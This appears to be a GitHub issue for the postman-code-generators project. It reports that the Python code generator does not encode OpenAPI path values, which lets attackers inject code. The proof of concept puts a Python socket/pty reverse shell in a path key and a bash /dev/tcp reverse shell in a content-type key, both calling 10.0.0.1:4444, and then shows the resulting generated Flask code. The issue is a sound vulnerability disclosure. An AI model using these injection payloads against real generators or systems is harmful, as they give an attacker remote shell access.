postman-code-generators
postman-code-generators copied to clipboard
Python Code Generator does not encode payloads and could be used to inject malicious code
Describe the bug Python code generator does not encode payloads and could be used to inject malicious payloads.
To Reproduce If you create a definition as follows, you can see the Python code generation does not encode the paths data that is sent.
{
"openapi": "3.0.2",
"info": {
"version": "1.0.0",
"title": "Code",
"description": "Code Proof of concept"
},
"paths": {
"/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#": {
"get": {
"operationId": "CodeInjection",
"responses": {
"200": {
"description": "Let's do this!",
"content": {
"application/json\"'; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 | echo \"": {}
}
}
}
}
}
}
}
This results in:
from flask import Blueprint, request
from webargs.flaskparser import parser
from marshmallow import Schema, fields
from ..schemas import model
from .. import impl
bp = Blueprint('nothing', __name__)
@bp.route('/nothing/code-PoC', methods=['get']);import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh');#', methods=['get'])
def CodeInjection():
return impl.nothing.CodeInjection()
Screenshots
Please assign this to me, I want to work on this issue. @akshaydeo @awillard1